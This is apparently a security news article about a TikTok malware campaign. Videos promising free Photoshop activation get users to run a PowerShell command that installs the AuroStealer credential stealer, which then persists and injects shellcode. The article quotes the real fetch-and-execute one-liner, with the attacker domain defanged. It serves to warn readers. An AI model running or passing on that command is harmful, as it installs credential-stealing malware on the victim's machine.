Cybercriminals are exploiting TikTok’s massive user base to distribute sophisticated malware, luring victims with promises of free software activation but delivering dangerous payloads instead. The attack leverages social engineering, similar to the ClickFix technique, tricking unsuspecting users into executing malicious PowerShell commands on their own systems.
The Infection Chain
Victims encounter TikTok videos that offer free activation for popular software like Photoshop, with one detected video accumulating over 500 likes before it was identified. The attack requires users to follow explicit instructions to open PowerShell with administrator privileges and run a simple, one-line command: iex (irm slmgr[.]win/photoshop).
This initial infection vector fetches and executes malicious PowerShell code from a remote server. The script then downloads a second-stage executable, updater.exe, which has been identified as the AuroStealer malware. AuroStealer is designed to harvest sensitive credentials and system information.
Evasion and Persistence
Internet Storm Center researchers found that the malware achieves persistence through scheduled tasks that are cunningly disguised as legitimate system processes. The malware randomly selects names such as “MicrosoftEdgeUpdateTaskMachineCore” to blend in with genuine Windows services, ensuring it executes every time the user logs on.
The campaign then introduces an advanced evasion technique with a third payload, source.exe. This file uses a self-compiling technique by leveraging the .NET Framework compiler during runtime. This dynamic compilation bypasses traditional detection mechanisms. The compiled C# code then allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing any additional files to disk.
Researchers have discovered multiple variations of this campaign across TikTok, all targeting users searching for cracked software. This highlights the severe risks of downloading applications from any untrusted source.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
